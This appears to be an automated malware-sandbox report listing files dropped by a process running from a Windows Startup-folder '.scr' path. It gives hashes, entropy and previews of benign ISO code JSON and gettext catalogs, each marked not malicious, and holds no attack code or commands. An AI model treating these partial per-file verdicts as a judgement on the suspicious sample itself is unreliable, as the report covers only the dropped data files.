                                                                                                    Preview:{. "639-3": [. {. "alpha_3": "aaa",. "name": "Ghotuo",. "scope": "I",. "type": "L". },. {. "alpha_3": "aab",. "name": "Alumu-Tesu",. "scope": "I",. "type": "L". },. {. "alpha_3": "aac",. "name": "Ari",. "scope": "I",. "type": "L". },. {. "alpha_3": "aad",. "name": "Amal",. "scope": "I",. "type": "L". },. {. "alpha_3": "aae",. "inverted_name": "Albanian, Arb.resh.",. "name": "Arb.resh. Albanian",. "scope": "I",. "type": "L". },. {. "alpha_3": "aaf",. "name": "Aranadan",. "scope": "I",. "type": "L". },. {. "alpha_3": "aag",. "name": "Ambrak",. "scope": "I",. "type": "L". },. {. "alpha_3": "aah",. "inverted_name": "Arapesh, Abu'",. "name": "Abu' Arapesh",. "scope": "I",. "type": "L". },. {. "alpha_3": "aai",. "name": "Arifama-Miniafia",. "scope": "I",.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8486
                                                                                                    Entropy (8bit):3.9700015674324263
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ejkj5mAB/VVgPUOCFulVbmv5e37K9NnH2k:EjiJ9VVgK2bmLH
                                                                                                    MD5:6B5F7EAA676D315C8B4417D2650E72F5
                                                                                                    SHA1:FBA7E7E0ABC79359904169BFD596D5DF6A5A545A
                                                                                                    SHA-256:12CC06FF3ED95EB809174A686CB2AE73315F3CB16582CF6FE4267CE7A2AD6198
                                                                                                    SHA-512:85012685FF0B74FD7B7D43B090C0E6B9EB6DD27495E7E7AD821A94F8DCCBA9703FEC6DA4C433DE16A29A5498A59165960966DBE1C5581BA3AB26E5558EB17277
                                                                                                    Malicious:false
                                                                                                    Preview:{. "639-5": [. {. "alpha_3": "aav",. "name": "Austro-Asiatic languages". },. {. "alpha_3": "afa",. "name": "Afro-Asiatic languages". },. {. "alpha_3": "alg",. "name": "Algonquian languages". },. {. "alpha_3": "alv",. "name": "Atlantic-Congo languages". },. {. "alpha_3": "apa",. "name": "Apache languages". },. {. "alpha_3": "aqa",. "name": "Alacalufan languages". },. {. "alpha_3": "aql",. "name": "Algic languages". },. {. "alpha_3": "art",. "name": "Artificial languages". },. {. "alpha_3": "ath",. "name": "Athapascan languages". },. {. "alpha_3": "auf",. "name": "Arauan languages". },. {. "alpha_3": "aus",. "name": "Australian languages". },. {. "alpha_3": "awd",. "name": "Arawakan languages". },. {. "alpha_3": "azc",. "name": "Uto-Aztecan languages". },. {. "alpha_3": "bad
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):528
                                                                                                    Entropy (8bit):5.318928648358197
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4r1xxLtt02Ukj/xtLLCw/4FR03XmBQWiOWRl:RTjt0U7Kw/tXmGRl
                                                                                                    MD5:B960B91D8FF9B37C41E9AAC109131B39
                                                                                                    SHA1:C281597638779D6AA47393B137CC9BCD30F9EE61
                                                                                                    SHA-256:937B8611C18CC9457DAFE2DBEF52CEA97AE82D0A7F221913021AF43C3DD4F5ED
                                                                                                    SHA-512:8990AE4F059C91931D149C4CD99ADCA2DFE3C61105638FEBD6BAEE806478475595185D445FC01051362EE66DD3CB5E08A2B46FA6F6442A0DEA87EF0E8F39EE9E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 21:46+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Abkhazian <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ab/>.Language: ab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-5
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.154022087662006
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxqZCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGi3XmBQ8KMW0YEi9:i4cxxq8t02Ukx/iximCg5ITf3XmBQWi9
                                                                                                    MD5:350DBE627717926E49768AE31416C9F6
                                                                                                    SHA1:BA36B0A2CC1250C40931B53C325705EE52AE97B1
                                                                                                    SHA-256:E466E8BBB33A91F0DCBCA4CDFAB8D868EE44873175F697884CE6C0295E060653
                                                                                                    SHA-512:F8508E42BB34E7591EF8310F81143751346FA58C4C470A35F60547E1BD8199E824D67F7E83E67EA468D19E037C3B2F0CFF7C8DFDD74EB3293849FACD63A9E9EA
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):524
                                                                                                    Entropy (8bit):5.262749539581619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i49xxLtt02UkrW/xtLLPQ/4FzfsXmBQWiOWzBl:R/jt0UuXQ/asXmGzBl
                                                                                                    MD5:136E614EDB40F55F7C5ABD2D1DC44602
                                                                                                    SHA1:70504568753E8D8C65B63ED185988B2833758B6D
                                                                                                    SHA-256:E95926F2E5F2AB6E7F4908FFAF3B3E181A4D64F77C217280A10F5721F797A459
                                                                                                    SHA-512:618DB35CC664BBC490E468AE880DF2890564697D0D4EB6F32BD009C1BF8A9610C320B6D78B30ACACD1FE73A3BE59F8CB274952755DE19254CA7FA39366A3828B
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-26 17:27+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Acehnese <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ace/>.Language: ace.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=1; plural=0;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 212 messages, Project-Id-Version: iso_3166-1 'Apaghanicitan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9144
                                                                                                    Entropy (8bit):4.697906904467747
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:RiiXoeeolUBdwQsjT/aR6/ug09pVg80z1mivD+:RieJ+KJjzaE/ugUpViz1vD+
                                                                                                    MD5:FC1083F73CA919EAC242543EFCC4EE40
                                                                                                    SHA1:AEA083973AAA73E080330D4D78AB53DB686896B6
                                                                                                    SHA-256:DAEB1B8C3CC3A8C8196B34B013EBDD81CD3C4CEEDC82DBC2B6CA092F87C9277E
                                                                                                    SHA-512:D68CD7F9EE97D8060B770F9A84A09E11A40AD650665B1AC40961793D08BE28CE39F879DBC49D1AA72E328F4E6F1185BF6CAEC45D3B0C7C351142396D81E62ECF
                                                                                                    Malicious:false
                                                                                                    Preview:........................\.......................................................................................!.......)......./.......9.......A.......L.......T.......\.......g.......p.......x...............................................................................................................................(......./.......>.......W.......\.......b.......h.......y...............................................................................................................................#.......).......5.......G.......O.......W.......`.......n.......s.......{.......................................................................................................................................&.......-.......;.......B.......H.......Q.......[.......c.......k.......q.......{............................................................................................................................................... .......(...............<.......F.......Q.......\.......c.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22487
                                                                                                    Entropy (8bit):5.008339607519126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:imSxiJzN0cqGEoqWw5+d5wsOP4d0kAEKuEXG9crnZZCx+hNATVpE:8xiJz6ccymsOP4d0kAEE7ZMxaNATE
                                                                                                    MD5:5C08FAE5691C92BE1055E816B19E8A57
                                                                                                    SHA1:DF995D99447B5901C6573EDF410A7E56FF067625
                                                                                                    SHA-256:E15C5D7853376185C282D8DC77FA07459442B4EC25226F0E4891D9DBD52D5427
                                                                                                    SHA-512:9265A99B93BC34648AFDE737A0FC36478E5C46547ADE1284B9E9F05130BFA7CAE581FBD35CAA679B4CF4279702C41C162AA0DF859331A6D84E3820A9DF669168
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".......".......".. ....".......#......"#......+#......9#......@#......_#......v#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......!$......*$......C$......_$......g$..%...m$.......$.......$.......$.......$.......$.......$.......$.......$.......$..%....$..,....%.."...A%..*...d%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......9&..'...G&..$...o&.......&.......&.......&.......&.......'......%'......*'......2'......9'......G'......X'......h'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(...... (.......(......5(..!...;(......](......o(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 10 messages, Project-Id-Version: iso_3166-3 'Oos-Timor'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1001
                                                                                                    Entropy (8bit):5.19647318305491
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Li7/HpXCTWULH3Q25t0UASxh+Rg3XmFRjX+ZJKS:Li7PWL1oUAUAgmFAJ9
                                                                                                    MD5:497861678533603AD103D5D96D367B20
                                                                                                    SHA1:46C209AEBB3107CB23062DBFAFF82B7B8202A9CE
                                                                                                    SHA-256:DECE78F315A094FC3E73EB33B22D953ED4AD240F5864C28DE6C90ADF0993E10E
                                                                                                    SHA-512:0B05BA0996B023A76B2D1B220698DDBE835943BBA2E1831BB7DA2D7E5B2344F5BB6C8B3C01D9E789733E17E8FC93FCAB7B05E7DAB014F6BAB30FA12D67F06FF6
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............................................'.......<.......R...)...d...................}...........8.......B.......`.......q.................../............................................................................East Timor.German Democratic Republic.Johnston Island.Netherlands Antilles.Serbia and Montenegro.Southern Rhodesia.USSR, Union of Soviet Socialist Republics.Upper Volta, Republic of.Zaire, Republic of.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2007-11-17 11:40+0200.Last-Translator: Friedel Wolff <friedel@translate.org.za>.Language-Team: Afrikaans <translate-discuss-af@lists.sourceforge.net>.Language: af.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Oos-Timor.Duitse Demokratiese Republiek.Johnston-Eilande.Nederlands-Antille.Serwi. en Montenegro.Suid-Rhodesi..USSR, Unie van Sowi.t Sosialistiese Republieke.Bo-Volta.Za.re
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 130 messages, Project-Id-Version: iso_639-3 'Abgasies'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5414
                                                                                                    Entropy (8bit):4.6008216093853465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:wQE7o5DIfuFHwYsTDO2qNu+Y0pwKz19MG+gaB719x05bzxcMJ:wQEsh2t1OpNQKz1eB7zwzxcO
                                                                                                    MD5:8D90C322A8101CB2A82649A9014376A0
                                                                                                    SHA1:82EFD431E9631494760E2F02E376BF35A1F1D7E6
                                                                                                    SHA-256:16612EFB6898F60EF4D152EFAEE0FC2D510622E1E87E3C6E51A48597B380493F
                                                                                                    SHA-512:045AF8EBDB81471F1EFE008EB8855DE28B86A54F946FA12F829172A5FAC18BD7A108515EC0AC02CFC88C85674C83F15674E36BC6FC1F61AE851CBC53FD0E4870
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<...............................................................".......+.......4.......;.......G.......N.......Y.......a.......i.......p.......z.......................................................................................................................................................................#.......,.......3.......:.......B.......K.......Q.......Z.......a.......g.......q.......{...............................................................................................................................................................$......./.......9.......>.......F.......K.......Q.......Y.......c.......v.......|.......................................................................................................................................................%.......,.......<.......D.......N.......T.......\.......d.......j.......p.......v.......}...............................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):522
                                                                                                    Entropy (8bit):5.297164375884388
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4h1xxLtt02UknF//xtLLGq/4FmLXmBQWiOWjl:Rhnjt0Uteq/3XmGjl
                                                                                                    MD5:FF23F6CD19366D89E1D412EF1B2D254D
                                                                                                    SHA1:53E3EBFB94CC9A3D386F46614F2B0B2255353C2B
                                                                                                    SHA-256:1DF290323B16856F4D8BB69CF67A9E4334AB3837BF20EF586FB3B9C975B1C259
                                                                                                    SHA-512:23160D39C937B7EF88E4576A4B5C145BEF04D7E54240B921772D8F56CDC04912AC1518126CF2D8E6DFFFB6729B754F6D0219B0F1CBCC9416214AA9F9E08AE92E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 21:08+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Akan <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ak/>.Language: ak.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 123 messages, Project-Id-Version: iso_3166-1 '\341\214\220\341\210\224\341\211\243\341\212\222\341\215\242'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6413
                                                                                                    Entropy (8bit):5.1032722532504025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6rcfLwy5VKFVZDThoY3l7AlzAh2JPM5DHC:6skaoFV3l3l7AlLNM5DHC
                                                                                                    MD5:7C182C40D80A36252511997B1ABBE25D
                                                                                                    SHA1:EF20E5B7497CEB4DF73D254833DA53E2513CFB39
                                                                                                    SHA-256:DE3B22D6226C7ED85DBF19260AFD5586F1CECE90DE87EE06CF2842134A9399B5
                                                                                                    SHA-512:FDEA8AC807AFDC5AAD916FEBCB59AD429568497ED40864E24B7AFC317BC674E3E7F92C5C3DAAF38983173686A0A865D82CD2790F670E3F7081E04B1E4CC3F7AE
                                                                                                    Malicious:false
                                                                                                    Preview:........{.......................h.......i.......q.......y.......................................................................................................................................................(.......A.......F.......L.......R.......[.......c.......i.......q.......x.......................................................................................................................!.......).......1.......8.......?.......M.......T.......Z.......d.......l.......t.......z...........................................................&...........................................................................".......-.......7.......>.......^.......g.......o.......w.......}.......................................................................................................................................+.......1.......;.......A.......H.......T.......i.......t...............................................................................................(.......=.......L.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\215\210\341\210\264\341\210\222\341\212\225\341\215\245\341\210\265 \341\214\220\341\212\225\341\211\262\341\210\224\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476
                                                                                                    Entropy (8bit):5.395480240945663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWIlTa9NNGYxA9Ct0vOuvP0NXzffUWU//R1iMA2KMiRlF2AFQmWXmBQ8KMW0Yl:iXQ1xjt02Ukc/Ki4FL3WXmBQWimRw
                                                                                                    MD5:A5CA220438A3466E1906B666DE2C72D0
                                                                                                    SHA1:2DFD561FB82492E8F4018E09A157440F950E199E
                                                                                                    SHA-256:BF2C3A0B0AB749038858FEA00D123479EC5EA32751D01DC6AA2AD4C5EFADE35F
                                                                                                    SHA-512:FEB8F7102D4F9C29FEF3569DD2FC77F92DB8C8697CD2BB2DD4E59BB809631E6FFE3A4EF8D58EE04E600F18595CA9BF6FCEFBF02118ED76A925C809BE3834DE5D
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...O...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-04-07 08:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Amharic.Language: am.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 120 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5797
                                                                                                    Entropy (8bit):4.930590372753605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:eQGmdpU6/pkUjoaCp/vmnEKbpJ95MQ+/sk2pL5lsx2OrtZFjVoEP0GCuk:eQGmd+5KymnEKD9q4lIkOrtZFjnMuk
                                                                                                    MD5:293268BF59BB1567A14CDF2A9E9D3D6A
                                                                                                    SHA1:18E0EEBD7B940398E4AAC05EB4F21B574DC446A7
                                                                                                    SHA-256:C85D7239D881068D69C0E32D03C44251F1ACFEB31FC15E68314740E69DB77538
                                                                                                    SHA-512:CD0193F0D07C5521681773D69E36B97E3BC510980F15B276FDDF1C0386D250F998D0AE4EA7F825802A4D131AB72CF0A8F7482B014A3F5BD7CA1FB508B40D6C54
                                                                                                    Malicious:false
                                                                                                    Preview:........x.......................(.......).......3.......8.......B.......K.......S.......Z.......c.......l.......s.......................................................................................................................................................................#.......*.......2.......9.......>.......G.......N.......V......._.......e.......l.......r.......|...............................................................................................................................................................$......./.......:.......C.......M.......U.......[.......c.......m.......w.......}............................................................................................................................................................... .......(.......0.......6.......<.......B.......I.......N.......V.......\.......e.......{.......................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 62 messages, Project-Id-Version: iso_3166-1 'Afganist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3810
                                                                                                    Entropy (8bit):4.94535105918381
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:9KBJc5opMz7ez6n+skNxL44EVogTiDyRIgNGiGVE/OiVv:9uc5r/ez6n+t44LgDzG2/Fv
                                                                                                    MD5:076CD88247DE3DD4DDCBF4041F14275B
                                                                                                    SHA1:0D9DEA07812CFB18250E95C0DAB923D84C535ECA
                                                                                                    SHA-256:97FE943D591166D88F2F06184E9CF9BD480CE766D72B461AA37F4F9E2AC7B81A
                                                                                                    SHA-512:78710044D450725A5500737042C97FE9D2BC348031583B937297E0717F1995EEF1CE4624DA58649585637DDE855A71B89C25D5076F36FEFF8DA2CB7E4855CF89
                                                                                                    Malicious:false
                                                                                                    Preview:........>...........S...........H.......I.......U.......].......l.......t.......{.......................................................................................................................................&.......,.......4.......;.......C... ...c...............................................................................................;.......W.......w...............................................................-.......A.......U.......l..........."...........................................................)...............................".......*.......1.......9.......C.......U.......`.......u.......}............................................................................................................................... .......?.......T.......].......i.......p........................................................... .........../.......@.......R.......c.......................................................................6...!...J.......l.......................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 72 messages, Project-Id-Version: iso_15924 '\330\247\331\204\330\271\330\261\330\250\331\212\330\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4112
                                                                                                    Entropy (8bit):5.094627890194036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:82ZjcMBMlvld73Jl76eBjGxS3Q/iw5lqGRoA8Jpk8fnwh1juJip7UpT3VNLNv59i:8Ajc8M9ll2Sg/i+qGRoA8zk8fn01juY/
                                                                                                    MD5:23935D65DFAA2DE40DA0D3DD6BF70E1C
                                                                                                    SHA1:65488D398F87C646FD418127CD5429F00EE1CF8A
                                                                                                    SHA-256:CD45076D513BA26B9DB9245B890F93E522F980E3B66BC21BCCCBC6532DC585D1
                                                                                                    SHA-512:FF9B9B5729B8D792001DFB9024D5507FEA9D7D80FB8BFFF129B53250E7401FA80EDC31E4DA36FC73A9B8DDC81F15C4D2355FD812E99D9F02BFC8FE3AD62341D6
                                                                                                    Malicious:false
                                                                                                    Preview:........H.......\...a........... .......!.......(.......1.......9.......?.......G.......S.......\.......c.......k.......t.......z.......................................................................................................................................!.......).......2.......;.......F.......L.......P.......V.......\.......e.......n.......x...............................................................................................................................................*.......1.......:.......A.......G.......N.......V.......].......b.......j...%...s...............................................................................................1.......D.......S.......d.......u....................................................................... .......9.......H.......[.......r.......................................................................................*.......9.......I.......Y...%...r...................................#...................&.......5.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\330\243\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28339
                                                                                                    Entropy (8bit):5.223530512436414
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DkUJ9rcsYwL53/Ubjh5wsWP4XdAIzirGT7x69ms21nDRf8UP2OM/pKLx:jhZ9J9oTwL53ItmsWP4XdAIXxHFsOSS
                                                                                                    MD5:96DFC90CD5533954FE8D1551BE1BE37F
                                                                                                    SHA1:1990D72F47D2362A1343867670777B9DAB3553AE
                                                                                                    SHA-256:A8B531FC40CBA0BC11B2C237C7A484671764897AF3BA961733602747680D2CAF
                                                                                                    SHA-512:4870119D26EEB0E2178B470C3E308546BC2029E057A8EE5DE5281AD5DB40C9522557DFD639393CDE27A90EC6312A9880E7FD1F3C063FE0DF31F8F154809DC1D3
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\331\205\331\202\330\247\330\267\330\271\330\251 \330\247\331\204\331\205\330\255\331\212\330\267 \330\247\331\204\331\207\331\206\330\257\331\212 \330\247\331\204\330\250\330\261\331\212\330\267\330\247\331\206\331\212\331\221\330\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3225
                                                                                                    Entropy (8bit):5.507140544577716
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD+OVIxvJaRvGqIfdvqNuoU+XjJ/eBjfHdyBm7gKQUqTYBhau8:qD+rJuyBodJ/eBjVyijSYBh6
                                                                                                    MD5:DF9DB331943BF0C9394CA5F454937433
                                                                                                    SHA1:B97334002D652C1E0A9BAA62031E10763E11BAE0
                                                                                                    SHA-256:45A85A91ADF0057AECBD6B3DB8403EB058C8175F3AE8F1B56B212950B98C1E1B
                                                                                                    SHA-512:3DFE0233B7A94EC859B5A08E819E414DBB1D5DFFD35F70AC30D109C8183E79896A8AAA226D091C745825ED7ABEA5AE951035019C350F7CAB66F627555278DCC3
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................=.......9.......I...@...".......Q...........................'.......A...*...]...K.......:....... ...........0.......J.......^.......v...........4...............!...........&.......-...3...K...G.......&.......8...........'...A...;.......}........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 134 messages, Project-Id-Version: iso_4217 '\331\210\330\255\330\257\330\251 \330\255\330\263\330\247\330\250 \330\250\331\206\331\203 \330\247\331\204\330\252\331\206\331\205\331\212\330\251 \330\247\331\204\330\245\331\201\330\261\331\212\331\202\331\212'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8672
                                                                                                    Entropy (8bit):5.088811840979072
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:+Li8a5EBnbwaGqYYCygEDRlYDreXZnE13OIC0jFrl:wi8a5ERlNnTjlBJncXr
                                                                                                    MD5:A0490AC147E6F4D3106BFE7433889967
                                                                                                    SHA1:5AAC0844D770EFA54DDE519B20DD4048F2B8E0E5
                                                                                                    SHA-256:F90318CD0011709EE2A378D96C69061A67CD1F7CD8A939733C67DF453C2093B7
                                                                                                    SHA-512:A201F2FDCFDA2D9F961C04E9FE9D28CF1E0278763964A9DD27F7167C7429248F0846F3DF789D9412D03C9472DFD99EB250B7457EB2D552BE6E0DE07F2AA7EC93
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......H.......I.......].......e.......t............................................................................................... ...............<.......J.......Z.......p...0...}.......................................................................$.......*.......9.......>.......T.......c.......r.......w............................................................................................................... .......0.......@.......E.......J.......X......._.......d.......i.......x.......|...............................................................................................................#.......5.......H.......Y.......i.......x...............................................................................................................................%.......2.......E.......Q......._.......p.......w...............................................................................................................#.......6...A...<.......~.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 158 messages, Project-Id-Version: iso_639-3 '\330\247\331\204\330\243\330\250\330\256\330\247\330\262\331\212\330\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8284
                                                                                                    Entropy (8bit):4.992585254654436
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:S1mLiRW8DnCZMmfZ03a+DHcBvWHvQ5mSULrHNRbnCSIt6Ly6T0XW4gsIKAzqSeGi:S8Lis8DCDxQsWHkE0X
                                                                                                    MD5:435DC6AEFD83A3B269203E19D5FD9452
                                                                                                    SHA1:EBBD320C43588C5A76DCBCE9951B2C8F4A114F2A
                                                                                                    SHA-256:C4F9177451BEC0337ADCF5AEB437FDE47E7EB333B5578C6EEBFDBFF5A9CECC15
                                                                                                    SHA-512:34E1EAA8BC4D08BC72B9D188BE94D26C5C3065CD16A304A45A81E7E0D967D2BC3E41456CA4CE43ADAB21BDC4AE63E025EBAA83F7ABED22985F05DC7D00AD35D0
                                                                                                    Malicious:false
                                                                                                    Preview:................................H.......I.......S.......\.......f.......~.......................................................................................................................................(...............6.......>.......E.......O.......W.......].......e.......m.......v.......................................................................................................................................................................................%.......*.......=.......E.......a.......k.......t.......|...............................................................................................................................................................................$.......*.......>.......F.......O.......V.......b.......k.......u.......|...............................................................................................................................................................".......*.......5.......<.......G.......O.......Z.......b.......
